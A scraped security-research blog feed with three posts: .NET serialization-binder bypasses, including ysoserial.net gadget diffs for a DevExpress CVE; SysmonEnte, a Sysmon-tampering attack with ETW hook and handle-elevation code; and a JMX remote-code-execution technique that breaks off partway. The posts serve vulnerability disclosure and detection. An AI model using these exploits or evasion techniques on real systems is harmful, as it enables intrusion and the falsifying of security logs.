Normal view

There are new articles available, click to refresh the page.
Before yesterdaycode white | Blog

Bypassing .NET Serialization Binders

28 June 2022 at 14:00

Serialization binders are often used to validate types specified in the serialized data to prevent the deserialization of dangerous types that can have malicious side effects with the runtime serializers such as the BinaryFormatter.

In this blog post we'll have a look into cases where this can fail and consequently may allow to bypass validation. We'll also walk though two real-world examples of insecure serialization binders in the DevExpress framework (CVE-2022-28684) and Microsoft Exchange (CVE-2022-23277), that both allow remote code execution.

Introduction

Type Names

Type names are used to identify .NET types. In the fully qualified form (also known as assembly qualified name, AQN), it also contains the information on the assembly the type should be loaded from. This information comprises of the assembly's name as well as attributes specifying its version, culture, and a token of the public key it was signed with. Here is an (extensive) example of such an assembly qualified name:

System.Collections.Concurrent.ConcurrentBag`1+ListOperation[
    [System.Object, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]
],
System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089

This assembly qualified name comprises of two parts with several components:

  • Assembly Qualified Name (AQN)
    • Type Full Name
      • Namespace
      • Type Name
      • Generic Type Parameters Indicator
      • Nested Type Name
      • Generic Type Parameters
      • Embedded Type AQN (EAQN)
    • Assembly Full Name
      • Assembly Name
      • Assembly Attributes

You can see that the same breakdown can also be applied to the embedded type's AQN. For simplicity, the type info will be referred to as type name and the assembly info will be referred to as assembly name as these are the general terms used by .NET and thus also within this post.

The assembly and type information are used by the runtime to locate and bind the assembly. That software component is also sometimes referred to as the CLR Binder.

Serialization Binders

In its original intent, a SerializationBinder was supposed to work just like the runtime binder but only in the context of serialization/deserialization with the BinaryFormatter, SoapFormatter, and NetDataContractSerializer:

Some users need to control which class to load, either because the class has moved between assemblies or a different version of the class is required on the server and client. — SerializationBinder Class

For that, a SerializationBinder provides two methods:

  • public virtual void BindToName(Type serializedType, out string assemblyName, out string typeName);
  • public abstract Type BindToType(string assemblyName, string typeName);

The BindToName gets called during serialization and allows to control the assemblyName and typeName values that get written to the serialized stream. On the other side, the BindToType gets called during deserialization and allows to control the Type being returned depending on the passed assemblyName and typeName that were read from the serialized stream. As the latter method is abstract, derived classes would need provide their own implementation of that method.

During the time .NET deserialization issues rose in 2017, the remark "SerializationBinder can also be used for security" was added to the SerializationBinder documentation. Later in 2020, that remark has been changed to the exact opposite:

That is probably why developers (mis-)use them as a security measure to prevent the deserialization of malicious types. And it is still widely used, even though those serializers have already been disapproved for obvious reasons.

But using a SerializationBinder for validating the type to be deserialized can be tricky and has pitfalls that may allow to bypass the validation depending on how it is implemented.

What could possibly go wrong?

For validating the specified type, developers can either

  1. work solely on the string representations of the specified assembly name and type name, or
  2. try to resolve the specified type and then work with the returned Type.

Each of these strategies has its own advantages and disadvantages.

Advantages/Disadvantages of Validation Before/After Type Binding

The advantage of the former is that type resolving is cost intensive and hence some advise against it to prevent a possible denial of service attacks.

On the other hand, however, the type name parsing is not that straight forward and the internal type parser/binder of .NET allows some unexpected quirks:

  • whitespace characters (i. e., U+0009, U+000A, U+000D, U+0020) are generally ignored between tokens, in some cases even further characters
  • type names can begin with a "." (period), e. g., .System.Data.DataSet
  • assembly names are case-insensitive and can be quoted, e. g., MsCoRlIb and "mscorlib"
  • assembly attribute values can be quoted, even improperly, e. g., PublicKeyToken="b77a5c561934e089" and PublicKeyToken='b77a5c561934e089
  • .NET Framework assemblies often only require the PublicKey/PublicKeyToken attribute, e. g., System.Data.DataSet, System.Data, PublicKey=00000000000000000400000000000000 or System.Data.DataSet, System.Data, PublicKeyToken=b77a5c561934e089
  • assembly attributes can be in arbitrary order, e. g., System.Data, PublicKeyToken=b77a5c561934e089, Culture=neutral, Version=4.0.0.0
  • arbitrary additional assembly attributes are allowed, e. g., System.Data, Foo=bar, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089, Baz=quux
  • assembly attributes can consist of almost arbitrary data (supported escape sequences: \", \', \,, \/, \=, \\, \n, \r, and \t)

This renders detecting known dangerous types based on their name basically impractical, which, by the way, is always a bad idea. Instead, only known safe types should be allowed and anything else should result in an exception being thrown.

In contrast to that, resolving the type before validation would allow to work with a normalized form of the type. But type resolution/binding may also fail. And depending on how the custom SerializationBinder handles such cases, it can allow attackers to bypass validation.

SerializationBinder Usages

If you keep in mind that the SerializationBinder was supposedly never meant to be used as a security measure (otherwise it would probably have been named SerializationValidator or similar), it gets more clear if you see how it is actually used by the BinaryFormatter, SoapFormatter, and NetDataContractSerializer:

  • System.Runtime.Serialization.Formatters.Binary.BinaryFormatter.ObjectReader.Bind(string, string)
  • System.Runtime.Serialization.Formatters.Soap.SoapFormatter.ObjectReader.Bind(string, string)
  • System.Runtime.Serialization.XmlObjectSerializerReadContextComplex.ResolveDataContractTypeInSharedTypeMode(string, string, out Assembly)

Let's have a closer look at the first one, ObjectReader.Bind(string, string) used by BinaryFormatter:

Here you can see that if the SerializationBinder.BindToType(string, string) call returns null, the fallback ObjectReader.FastBindToType(string, string) gets called.

Here, if the BinaryFormatter uses FormatterAssemblyStyle.Simple (i. e., bSimpleAssembly == true, which is the default for BinaryFormatter), then the specified assembly name is used to create an AssemblyName instance and it is then attempted to load the corresponding assembly with it. This must succeed, otherwise ObjectReader.FastBindToType(string, string) immediately returns with null. It is then tried to load the specified type with ObjectReader.GetSimplyNamedTypeFromAssembly(Assembly, string, ref Type).

This method first calls FormatterServices.GetTypeFromAssembly(Assembly, string) that tries to load the type from the already resolved assembly using Assembly.GetType(string) (not depicted here). But if that fails, it uses Type.GetType(string, Func<AssemblyName, Assembly>, Func<Assembly, string, bool, Type>, bool) with the specified type name as first parameter. Now if the specified type name happens to be a AQN, the type loading succeeds and it returns the type specified by the AQN regardless of the already loaded assembly.

That means, unless the custom SerializationBinder.BindToType(string, string) implementation uses the same algorithm as the ObjectReader.FastBindToType(string, string) method, it might be possible to get the custom SerializationBinder to fail while the ObjectReader.FastBindToType(string, string) still succeeds. And if the custom SerializationBinder.BindToType(string, string) method does not throw an exception on failure but silently returns null instead, it would also allow to bypass any type validation implemented in SerializationBinder.BindToType(string, string).

This behavior already mentioned in Jonathan Birch's Dangerous Contents - Securing .Net Deserialization in 2017:

Don't return null for unexpected types – this makes some serializers fall back to a default binder, allowing exploits.

Origin of the Assembly Name and Type Name

The assembly name and type name values passed to the SerializationBinder.BindToType(string, string) during deserialization originate from the serialized stream: the assembly name is read by BinaryAssembly.Read(__BinaryParser) and the type name by BinaryObjectWithMapTyped.Read(__BinaryParser).

On the serializing side, these values are written to the stream by BinaryAssembly.Write(__BinaryWrite) and BinaryObjectWithMapTyped.Write(__BinaryWriter). The written values originate from an SerObjectInfoCache instance, which are set in the two available constructors:

In the latter case, the assembly name and type name are obtained from the TypeInformation returned by BinaryFormatter.GetTypeInformation(Type). In the former case, however, the assembly name and type name are adopted from the SerializationInfo instance filled during serialization if the assembly name or type name was set explicitly via SerializationInfo.AssemblyName and SerializationInfo.FullTypeName, respectively.

That means, besides using SerializationInfo.SetType(Type), it is also possible to set the assembly name and type name explicitly and independently as strings by using SerializationInfo.AssemblyName and SerializationInfo.FullTypeName:

[Serializable]
class Marshal : ISerializable
{
    public void GetObjectData(SerializationInfo info, StreamingContext context)
    {
        info.AssemblyName = "…";
        info.FullTypeName = "…";
    }
}

There is also another and probably more convenient way to specify an arbitrary assembly name and type name by using a custom SerializationBinder during serialization:

class CustomSerializationBinder : SerializationBinder
{
    public override void BindToName(Type serializedType, out string assemblyName, out string typeName)
    {
        assemblyName = "…";
        typeName     = "…";
    }

    public override Type BindToType(string assemblyName, string typeName)
    {
        throw new NotImplementedException();
    }
}

This allows to fiddle with all assembly names and type names that are used within the object graph to be serialized.

Common Pitfalls of Custom SerializationBinders

There are two common pitfalls that can render a SerializationBinder bypassable:

  1. parsing the passed assembly name and type name differently than the .NET runtime does
  2. resolving the specified type differently than the .NET runtime does

We will demonstrate these with two case studies: the DevExpress framework (CVE-2022-28684) and Microsoft Exchange (CVE-2022-23277).

Case Study № 1: SafeSerializationBinder in DevExpress (CVE-2022-28684)

Despite its name, the DevExpress.Data.Internal.SafeSerializationBinder class of DevExpress.Data is not really a SerializationBinder. But its Ensure(string, string) method is used by the DXSerializationBinder.BindToType(string, string) method to check for safe and unsafe types.

It does this by checking the assembly name and type name against a list of known unsafe types (i. e., UnsafeTypes class) and known safe types (i. e., KnownTypes class). To pass the validation, the former must not match while the latter must match as both XtraSerializationSecurityTrace.UnsafeType(string, string) and XtraSerializationSecurityTrace.NotTrustedType(string, string) result in an exception being thrown.

The check in each Match(string, string) method comprises of a match against so called type ranges and several full type names.

A type range is basically a pair of assembly name and namespace prefix that the passed assembly name and type name are tested against.

Here is the definition of UnsafeTypes.typeRanges that UnsafeTypes.Match(string, string) tests against:

And here UnsafeTypes.types:

This set basically comprises the types used in public gadgets such as those of YSoSerial.Net.

Remember that SafeSerializationBinder.Ensure(string, string) does not resolve the specified type but only works on the assembly names and type names read from the serialized stream. The type binding/resolution attempt happens after the string-based validation in DXSerializationBinder.BindToType(string, string) where Assembly.GetType(string, bool) is used to load the specified type from the specified assembly but without throwing an exception on error (i. e., the passed false).

We'll demonstrate how a System.Data.DataSet can be used to bypass validation in SafeSerializationBinder.Ensure(string, string) despite it is contained in UnsafeTypes.types.

As DXSerializationBinder.BindToType(string, string) can return null in two cases (assembly == null or Assembly.GetType(string, bool) returns null), it is possible to craft the assembly name and type name pair that does fail loading while the fallback ObjectReader.FastBindToType(string, string) still returns the proper type.

In the first attempt, we'll update the ISerializable.GetObjectData(SerializationInfo, StreamingContext) implementation of the DataSet gadget of YSoSerial.Net so that the assembly name is mscorlib and the type name the AQN of System.Data.DataSet:

diff --git a/ysoserial/Generators/DataSetGenerator.cs b/ysoserial/Generators/DataSetGenerator.cs
index ae4beb8..1755e62 100644
--- a/ysoserial/Generators/DataSetGenerator.cs
+++ b/ysoserial/Generators/DataSetGenerator.cs
@@ -62,7 +62,8 @@ namespace ysoserial.Generators

         public void GetObjectData(SerializationInfo info, StreamingContext context)
         {
-            info.SetType(typeof(System.Data.DataSet));
+            info.AssemblyName = "mscorlib";
+            info.FullTypeName = typeof(System.Data.DataSet).AssemblyQualifiedName;
             info.AddValue("DataSet.RemotingFormat", System.Data.SerializationFormat.Binary);
             info.AddValue("DataSet.DataSetName", "");
             info.AddValue("DataSet.Namespace", "");

With a breakpoint at DXSerializationBinder.BindToType(string, string), we'll see that the first call to SafeSerializationBinder.Ensure(string, string) gets passed. This is because we use the AQN of System.Data.DataSet as type name while UnsafeTypes.types only contains the full name System.Data.DataSet instead. And as the pair of assembly name mscorlib and type name prefix System. is contained in KnownTypes.typeRanges, it will pass validation.

But now the assembly name and type name are passed to SafeSerializationBinder.EnsureAssemblyQualifiedTypeName(string, string):

That method probably tries to extract the type name and assembly name from an AQN passed in the typeName. It does this by looking for the last position of , in typeName and whether the part behind that position starts with version=. If that's not the case, the loop looks for the second last, then the third last, and so on. If version= was found, the algorithm assumes that the next iteration would also contain the assembly name (remember, the version is the first assembly attribute in the normalized form), flag gets set to true and in the next loop the position of the preceeding , marks the delimiter between the type name and assembly name. At the end, the passed assemblyName value stored in a and the extracted assemblyName values get compared. If they differ, true gets returned an the extracted assembly name and type name are checked by another call to SafeSerializationBinder.Ensure(string, string).

With our AQN passed as type name, SafeSerializationBinder.EnsureAssemblyQualifiedTypeName(string, string) extracts the proper values so that the call to SafeSerializationBinder.Ensure(string, string) throws an exception. That didn't work.

So in what cases does SafeSerializationBinder.EnsureAssemblyQualifiedTypeName(string, string) return false so that the second call to SafeSerializationBinder.Ensure(string, string) does not happen?

There are five return statements: three always return false (lines 28, 36, and 42) and the other two only return false when the passed assemblyName value equals the extracted assembly name (lines 21 and 51).

Let's first look at those always returning false: in two cases (line 28 and 42), the condition depends on whether the typeName contains a ] after the last ,. We can achieve that by adding a custom assembly attribute to our AQN that contains a ], which is perfectly valid:

diff --git a/ysoserial/Generators/DataSetGenerator.cs b/ysoserial/Generators/DataSetGenerator.cs
index ae4beb8..1755e62 100644
--- a/ysoserial/Generators/DataSetGenerator.cs
+++ b/ysoserial/Generators/DataSetGenerator.cs
@@ -62,7 +62,8 @@ namespace ysoserial.Generators

         public void GetObjectData(SerializationInfo info, StreamingContext context)
         {
-            info.SetType(typeof(System.Data.DataSet));
+            info.AssemblyName = "mscorlib";
+            info.FullTypeName = typeof(System.Data.DataSet).AssemblyQualifiedName + ", x=]";
             info.AddValue("DataSet.RemotingFormat", System.Data.SerializationFormat.Binary);
             info.AddValue("DataSet.DataSetName", "");
             info.AddValue("DataSet.Namespace", "");

Now the SafeSerializationBinder.EnsureAssemblyQualifiedTypeName(string, string) returns false without updating the typeName or assemblyName values. Loading the mscorlib assembly will succeed but the specified DataSet type won't be found in it so that DXSerializationBinder.BindToType(string, string) also returns null and the ObjectReader.FastBindToType(string, string) attempts to load the type, which finally succeeds.

Case Study № 2: ChainedSerializationBinder in Exchange Server (CVE-2022-23277)

After my colleage @frycos published his story on Searching for Deserialization Protection Bypasses in Microsoft Exchange (CVE-2022–21969), I was curious whether it was possible to still bypass the security measures implemented in the Microsoft.Exchange.Diagnostics.ChainedSerializationBinder class.

The ChainedSerializationBinder is used for a BinaryFormatter instance created by Microsoft.Exchange.Diagnostics.ExchangeBinaryFormatterFactory.CreateBinaryFormatter(DeserializeLocation, bool, string[], string[]) to resolve the specified type and then test it against a set of allowed and disallowed types to abort deserialization in case of a violation.

Within the ChainedSerializationBinder.BindToType(string, string) method, the passed assembly name and type name parameters are forwarded to InternalBindToType(string, string) (not depicted here) and then to LoadType(string, string). Note that only if the type was loaded successfully, it gets validated using the ValidateTypeToDeserialize(Type) method.

Inside LoadType(string, string), it is attempted to load the type by combining both values in various ways, either via Type.GetType(string) or by iterating the already loaded assemblies and then using Assembly.GetType(string) on it. If loading of the type fails, LoadType(string, string) returns null and then BindToType(string, string) also returns null while the validation via ValidateTypeToDeserialize(Type) only happens if the type was successfully loaded.

When the ChainedSerializationBinder.BindToType(string, string) method returns to the ObjectReader.Bind(string, string) method, the fallback method ObjectReader.FastBindToType(string, string) gets called for resolving the type. Now as ChainedSerializationBinder.BindToType(string, string) uses a different algorithm to resolve the type than ObjectReader.FastBindToType(string, string) does, it is possible to bypass the validation of ChainedSerializationBinder via the aforementioned tricks.

Here either of the two ways (a custom marshal class or a custom SerializationBinder during serialization) do work. The following demonstrates this with System.Data.DataSet:

Conclusion

The insecure serializers BinaryFormatter, SoapFormatter, and NetDataContractSerializer should no longer be used and legacy code should be migrated to the preferred alternatives.

If you happen to encounter a SerializationBinder, check how the type resolution and/or validation is implemented and whether BindToType(string, string) has a case that returns null so that the fallback ObjectReader.FastBindToType(string, string) may get a chance to resolve the type instead.

Attacks on Sysmon Revisited - SysmonEnte

In this blogpost we demonstrate an attack on the integrity of Sysmon which generates a minimal amount of observable events making this attack difficult to detect in environments where no additional security products are installed.

tl;dr:

  • Suspend all threads of Sysmon.
  • Create a limited handle to Sysmon and elevate it by duplication.
  • Clone the pseudo handle of Sysmon to itself in order to bypass SACL as proposed by James Forshaw.
  • Inject a hook manipulating all events (in particular ProcessAccess events on Sysmon).
  • Resume all threads.

We also release a POC called SysmonEnte.

Background

At Code White we are used to performing complex attacks against hardened and strictly monitored environments. A reasonable approach to stay under the radar of the blue team is to blend in with false positives by adapting normal process- and user behavior, carefully choosing host processes for injected tools and targeting specific user accounts.

However, clients with whom we have been working for a while have reached a high level of maturity. Their security teams strictly follow all the hardening advice we give them and invest a lot of time in collecting and base-lining security related logs while constantly developing and adapting detection rules.

We often see clients making heavy use of Sysmon, along with the Windows Event Logs and a traditional AV solution. For them, Sysmon is the root of trust for their security monitoring and its integrity must be ensured. However, an attacker who has successfully and covertly attacked, compromised the integrity of Sysmon and effectively breaks the security model of these clients.

In order to undermine the aforementioned security-setup, we aimed at attacking Sysmon to tamper with events in a manner which is difficult to detect using Sysmon itself or the Windows Event Logs.

Attacks on Sysmon and Detection

Having done some Googling on how to blind Sysmon, we realized that all publicly documented ways are detectable via Sysmon itself or the Windows Event Logs (at least those we found) :

While we were confident that we can kill Sysmon before throwing Event ID 5 (Process terminated) we thought that a host not sending any events would be suspicious and could be observed in a client's SIEM. Also, loading a signed, whitelisted and exploitable driver to attack from Kernel land was out of scope to maintain stability.

Since all of these documented attack vectors are somehow detectable via Sysmon itself, the Windows Event Logs or can cause stability issues we needed a new attack vector with the following capabilities:

  1. Not detectable via Sysmon itself
  2. Not detectable via Windows Event Log
  3. Sysmon must stay alive
  4. Attack from usermode

Injecting and manipulating the control flow of Sysmon seemed the most promising.

Attack Description

Similarly to SysmonQuiet or EvtMute, the idea is to inject code into Sysmon which redirects the execution flow in such a way that events can be manipulated before being forwarded to the SIEM.
However, the attack must work in such a way that corresponding ProcessAccess events on Sysmon are not observable via Sysmon or the Event Log.

This presents various problems, but let us first see where such a hook would be applicable.

Manipulating the Execution Flow

Sysmon forwards events to ETW subscribers via the documented function ntdll!EtwEventWrite. This is easily observable by setting an appropriate breakpoint.

The function has the following prototype:

ULONG EVNTAPI EtwEventWrite( __in REGHANDLE RegHandle, __in PCEVENT_DESCRIPTOR EventDescriptor, __in ULONG UserDataCount, __in_ecount_opt(UserDataCount) PEVENT_DATA_DESCRIPTOR UserData );

The two most important arguments to the function are EventDescriptor and UserData.

typedef struct _EVENT_DESCRIPTOR { USHORT Id; UCHAR Version; UCHAR Channel; UCHAR Level; UCHAR Opcode; USHORT Task; ULONGLONG Keyword; } EVENT_DESCRIPTOR, *PEVENT_DESCRIPTOR;

The Id field of the EVENT_DESCRIPTOR determines the type of event and is important to apply the correct struct definition for the event data pointed to by PEVENT_DATA_DESCRIPTOR. The structs for the different events are obviously different for each Sysmon Event Id, as different fields and information are included. Our injected code must thus be able to apply the correct struct depending on which event is being emitted by Sysmon.

But how do we know the definition of the event structs? Luckily, ETW Explorer has already documented the event definitions:

A definition for the userdata struct describing a ProcessAccess event might therefore look as follows:

typedef struct _ProcessAccess { wchar_t* pRuleName; size_t sizeRuleName; wchar_t* pUtcTime; size_t sizeUtcTime; void* psrcGUID; size_t sizesrcguid; void* ppidsrc; size_t sizepidsrc; void* ptidsrc; size_t sizetidsrc; wchar_t* psourceimage; size_t sizesourceimage; void* ptarGUID; size_t sizetarGUID; void* ppiddest; size_t sizepiddest; wchar_t* ptargetimage; size_t sizetargetimage; PACCESS_MASK pGrantedAccess; size_t sizeGrantedAccess; wchar_t* pCalltrace; size_t sizecalltrace; wchar_t* pSourceUser; size_t sizeSourceUser; wchar_t* pTargetUser; size_t sizetargetUser; } ProcessAccess, *PProcessAccess;

We can validate this in x64dbg by setting a breakpoint at ntdll!EtwEventWrite and applying the said struct definition for a ProcessAccess event.

Faking events

ntdll!EtwEventWrite being responsible for forwarding events is a good place to install a hook to redirect the control flow to injected code which first manipulates the event and then forwards it:

The injected code manipulating the events might look like this:

//Hooked EtwEventWrite Function ULONG Hook_EtwEventWrite(REGHANDLE RegHandle, PCEVENT_DESCRIPTOR EventDescriptor, ULONG UserDataCount, PEVENT_DATA_DESCRIPTOR UserData) { //Get the address of the EtwEventWriteFull Function _EtwEventWriteFull EtwEventWriteFull = (_EtwEventWriteFull)getFunctionPtr(CRYPTED_HASH_NTDLL, CRYPTED_HASH_ETWEVENTWRITEFULL); if (EtwEventWriteFull == NULL) { goto exit; } //Check if it is a process access event and needs to be tampered with switch (EventDescriptor->Id) { case EVENT_PROCESSACCESS: HandleProcessAccess((PProcessAccess)UserData); break; default: break; } //Save the event with the EtwEventWriteFull Function EtwEventWriteFull(RegHandle, EventDescriptor, 0, NULL, NULL, UserDataCount, UserData); exit: return 0; } // Make ProcessAccess events targeting Sysmon itself look benign VOID HandleProcessAccess(PProcessAccess pProcessAccess) { ACCESS_MASK access_mask_benign = 0x1400; PCWSTR wstr_sysmon = L"Sysmon"; PCWSTR wstr_ente = L"Ente"; //Sysmon check psysmon = StrStrIW(pProcessAccess->ptargetimage, wstr_sysmon); if (psysmon != NULL) { //Replace the access mask with 0x1400 *pProcessAccess->pGrantedAccess = access_mask_benign; pProcessAccess->sizeGrantedAccess = sizeof(access_mask_benign); //Replace the Source User with Ente lstrcpyW(pProcessAccess->pSourceUser, wstr_ente); pProcessAccess->sizeSourceUser = sizeof(wstr_ente); } }

Note, how ntdll!EtwEventWriteFull is used to forward every event.

Since we know where to inject the hook and what the UserData structs look like, we are now able to tamper with every Sysmon event before it is forwarded.

However, the injection into Sysmon remains observable and the corresponding ProcessAccess event is the last event we do not control.

Detection of Process Manipulation

OpenProcess Access event

In order to create a handle to Sysmon which allows us to conduct process injection of any kind, we need to open Sysmon with at least the following access mask: PROCESS_VM_OPERATION | PROCESS_VM_WRITE. As Sysmon has not yet been modified while we open this handle, a suspicious ProcessAccess Event is generated which is an IOC defenders could hunt for:

Handle Elevation

Playing with kernel32!DuplicateHandle for another project, we noticed that MSDN states something very interesting:

In some cases, the new handle can have more access rights than the original handle.

Thus, by first creating a handle with a very limited access mask and then duplicating this handle with a new access mask, we technically do not create a new handle with a high access mask.

HANDLE hSysmon = NULL; HANDLE hhighpriv = NULL; BOOL bsuccess = FALSE; hSysmon = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, 3340); bsuccess = DuplicateHandle(GetCurrentProcess(), hSysmon, GetCurrentProcess(), &hhighpriv, PROCESS_ALL_ACCESS, FALSE, 0);

Sysmon, (to the best of our knowledge) only using OB_OPERATION_HANDLE_CREATE, only sees the benign access mask, but not the duplication of the handle with a higher access mask:

Using handle elevation we can gain handles with arbitrary process access masks to arbitrary (non-ppl) processes while Sysmon only logs the instantiation of the original handle. Great Success!

Unfortunately, there are some problems:

  1. This only works if the targeted process runs as the same user as the duplicating process.

This can be easily circumvented by stealing a token from a System process. We steal the token from an elevated svchost process running as System by only using a PROCESS_QUERY_LIMITED_INFORMATION mask, where we do not need the SE_DEBUG privilege which is often used in detection rules.

  1. System Access Control Lists (SACL). This is a bigger problem

Detection via System Access Control Lists (SACL)

Unfortunately, it is still possible to observe the duplication of the handle by configuring Object Access Auditing using a SACL on Sysmon. The following screenshot shows how ProcessHacker is leveraged to configure the SACL:

With this SACL, event 4656 is generated by the Windows Event Log Service upon creation of a handle to Sysmon allowing to write in its memory.
This event is also emitted, if handle elevation is used.

Note: In the default config, Object Access Auditing is not enabled.

SACL Bypass by James Forshaw

Fortunately for us, James Forshaw published a great blogpost on how to evade SACL.

According to the post, we can duplicate the pseudo handle of a different process to itself to get full access to the process without triggering Object Access Auditing.

A stealthy way to gain a handle suitable for process injection would be the following:

  1. Open a process handle to Sysmon with a very limited access mask (A detection rule based on this would generate too many false positives)
  2. Elevate this handle using ntdll!DuplicateObject to hold the PROCESS_DUP_HANDLE right (Bypasses Sysmon's telemetry)
  3. Use the elevated handle to duplicate the pseudo Handle of Sysmon (Bypasses SACL).
uPid.UniqueProcess = dwPid; uPid.UniqueThread = 0; ntStatus = NtOpenProcess(&hlowpriv, PROCESS_QUERY_LIMITED_INFORMATION, &ObjectAttributes, &uPid); if (!NT_SUCCESS(ntStatus)) FATAL("[-] Failed to open low priv handle to sysmon\n"); ntStatus = NtDuplicateObject(NtCurrentProcess(), hlowpriv, NtCurrentProcess(), &hduppriv, PROCESS_DUP_HANDLE, FALSE, 0); if (!NT_SUCCESS(ntStatus)) FATAL("[-] Failed to elevate to handle with PROCESS_DUP_HANDLE rights\n"); ntStatus = NtDuplicateObject(hduppriv, NtCurrentProcess(), NtCurrentProcess(), &hhighpriv, PROCESS_ALL_ACCESS, FALSE, 0); if (!NT_SUCCESS(ntStatus)) FATAL("[-] Failed to elevate to handle with PROCESS_ALL_ACCESS rights\n");

Doing so we gain a full access handle to Sysmon while bypassing Sysmon's telemetry and SACL.

Fine Tuning

There was one last IOC we could come up with. Sysmon can only observe the creation of a limited handle to itself, however, following the golden rule of never touching disk, our tool being unpacked or injected into another process will have a broken calltrace containing unknown sections. Since Sysmon has not been tampered with at this point, this would be the last event which we do not have under control and might be sufficient to create a detection rule upon!

We can delay the forwarding of this event by suspending all threads of Sysmon. The events are then queued and dispatched only after we resume the threads, giving us enough time to install a hook manipulating all ProcessAccess events on Sysmon itself. This is possible, because no events for accessing, suspending or resuming a thread exist in Sysmon.

The hook then necessarily spoofs the callstack included in the ProcessAccess event.

Putting It All Together

We combined all of these steps into a tool we call SysmonEnte which you can find on our Github.

SysmonEnte is implemented as fully position independent code (PIC) which can be called using the following prototype:

DWORD go(DWORD dwPidSysmon);

A sample loader is included and built during compilation when typing make.

Additionally, SysmonEnte uses indirect syscalls to bypass userland hooks while injecting into Sysmon.

The open source variant tampers with process access events to Lsass and Sysmon and sets the access mask to a benign one. Additionally, the source user and the callstack is set to Ente. You can change these to your needs.

Possible Detection Methods

Certain detection ideas exist from our point of view:

ETW TI

The easiest solution would be to subscribe to the Threat Intelligence ETW provider to observe injections or suspicious code manipulations. This however requires a signed ELAM driver.

Kernel Callbacks

If you have the possibility to run as a kernel driver you can probably implement the callback for the OB_OPERATION_HANDLE_DUPLICATE to monitor for Object Access Auditing Bypasses. https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/ns-wdm-_ob_operation_registration

Object Access Auditing

If you have the possibility to enable Object Access Auditing, you can configure a SACL for Sysmon to monitor the duplication of handles to catch the SACL bypass used to gain a handle to Sysmon. We are not sure about false positives in large environments though.

To the best of our knowledge, and in contrast to SACLs for filesystem- or registry operations, configuring Object Access Auditing on processes is only achievable by writing a custom program. This circumstance makes the detection of handle duplication via SACL non-trivial.

A sample program is included on our Github and configures a SACL with ACCESS_SYSTEM_SECURITY + PROCESS_DUP_HANDLE + PROCESS_VM_OPERATION and is applied to the group Everyone. ACCESS_SYSTEM_SECURITY is included as otherwise, attackers can covertly change the SACL.

With this configuration, attempts to duplicate a handle to Sysmon should become visible.

Note: Object Access Auditing is not enabled by default and must be enabled via Group Policy prior the use of the tool.

Final Words

Sysmon on it's own is not able to protect itself sufficiently, and it is difficult to observe the described attack with the event log.
We believe that running Sysmon alone, without any protection from a trusted third party tool sitting in kernel land or running as a PPL, is not guaranteed to produce reliable logs with ensured integrity. A possible fix by Microsoft would be to allow running Sysmon as a PPL.

It is noteworthy that the described technique of handle elevation + SACL bypass can also be used to stealthily dump Lsass.

After our talk at X33fcon, nanodump supports handle elevation as well. However, a SACL with PROCESS_VM_READ is configured for Lsass by default. ;-)

References

JMX Exploitation Revisited

20 March 2023 at 09:38

The Java Management Extensions (JMX) are used by many if not all enterprise level applications in Java for managing and monitoring of application settings and metrics. While exploiting an accessible JMX endpoint is well known and there are several free tools available, this blog post will present new insights and a novel exploitation technique that allows for instant Remote Code Execution with no further requirements, such as outgoing connections or the existence of application specific MBeans.

Introduction

How to exploit remote JMX services is well known. For instance, Attacking RMI based JMX services by Hans-Martin Münch gives a pretty good introduction to JMX as well as a historical overview of attacks against exposed JMX services. You may want to read it before proceeding so that we're on the same page.

And then there are also JMX exploitation tools such as mjet (formerly also known as sjet, also by Hans-Martin Münch) and beanshooter by my colleague Tobias Neitzel, which both can be used to exploit known vulnerabilities and JMX services and MBeans.

However, some aspects are either no longer possible in current Java versions (e. g., pre-authenticated arbitrary Java deserialization via RMIServer.newClient(Object)) or they require certain MBeans being present or conditions such as the server being able to connect back to the attacker (e. g., MLet with HTTP URL).

In this blog post we will look into two other default MBean classes that can be leveraged for pretty unexpected behavior:

  • remote invocation of arbitrary instance methods on arbitrary serializable objects
  • remote invocation of arbitrary static methods on arbitrary classes

Tobias has implemented some of the gained insights into his tool beanshooter. Thanks!

Read The Fine Manual

By default, MBean classes are required to fulfill one of the following:

  1. follow certain design patterns
  2. implement certain interfaces

For example, the javax.management.loading.MLet class implements the javax.management.loading.MLetMBean, which fulfills the first requirement that it implements an interface whose name of the same name but ends with MBean.

The two specific MBean classes we will be looking at fulfill the second requirement:

Both classes provide features that don't seem to have gotten much attention yet, but are pretty powerful and allow interaction with the MBean server and MBeans that may even violate the JMX specification.

The Standard MBean Class StandardMBean

The StandardMBean was added to JMX 1.2 with the following description:

[…] the javax.management.StandardMBean class can be used to define standard MBeans with an interface whose name is not necessarily related to the class name of the MBean.

– Java™ Management Extensions (JMX™) (Maintenance Release 2)

Also:

An MBean whose management interface is determined by reflection on a Java interface.

– StandardMBean (Java Platform SE 8)

Here reflection is used to determine the attributes and operations based on the given interface class and the JavaBeans™ conventions.

That basically means that we can create MBeans of arbitrary classes and call methods on it that are defined by the interfaces they implement. The only restriction is that the class needs to be Serializable as well as any possible arguments we want to use in the method call.

public final class TemplatesImpl implements Templates, Serializable

Meet the infamous TemplatesImpl! It is an old acquaintance common in Java deserialization gadgets as it is serializable and calling any of the following public methods results in loading of a class from byte code embedded in the private field _bytecodes:

  • TemplatesImpl.getOutputProperties()
  • TemplatesImpl.getTransletIndex()
  • TemplatesImpl.newTransformer()

The first and last methods are actually defined in the javax.xml.transform.Templates interface that TemplatesImpl implements. The getOutputProperties() method also fulfills the requirements for a MBean attribute getter method, which makes it a perfect trigger for serializers calling getter methods during the process of deserialization.

In this case it means that we can call these Templates interface methods remotely and thereby achieve arbitrary Remote Code Execution in the JMX service process:

Here we even have the choice to either read the attribute OutputProperties (resulting in an invocation of getOutputProperties()) or to invoke getOutputProperties() or newTransformer() directly.

The Model MBean Class RequiredModelMBean

The javax.management.modelmbean.RequiredModelMBean is already part of JMX since 1.0 and is even more versatile than the StandardMBean:

This model MBean implementation is intended to provide ease of use and extensive default management behavior for the instrumentation.

– Java™ Management Extensions Instrumentation and Agent Specification, v1.0

Also:

